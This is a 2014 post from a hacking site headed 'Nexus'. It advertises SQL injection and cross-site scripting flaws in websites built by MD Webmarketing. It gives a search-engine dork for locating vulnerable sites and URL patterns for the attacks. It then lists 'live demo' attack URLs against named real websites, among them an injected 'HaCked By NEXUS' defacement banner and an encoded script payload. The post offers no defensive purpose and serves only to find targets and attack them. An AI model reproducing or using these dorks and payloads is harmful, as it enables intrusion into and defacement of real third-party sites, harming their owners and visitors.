Nexus

Home
Science
Politics
Technology
Space
News
Health

Home Unlabelled MD Webmarketing Cross Site Scripting / SQL Injection

MD Webmarketing Cross Site Scripting / SQL Injection

By 0x000216

Friday, July 04, 2014

Read

Add Comment

Dork:

"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

Exploits:

http://www.site-web.com/***.php?id= [SQL Injection]

http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

Live Demo:

SQL Injection:

http://www.pierreadrileiloes.com.br/exibe.php?id=61712%27

XSS (with HTML scripts):

http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Ch1%3EHaCked%20By%20NEXUS%20!%3C/h1%3E

XSS (with JavaScript):

http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E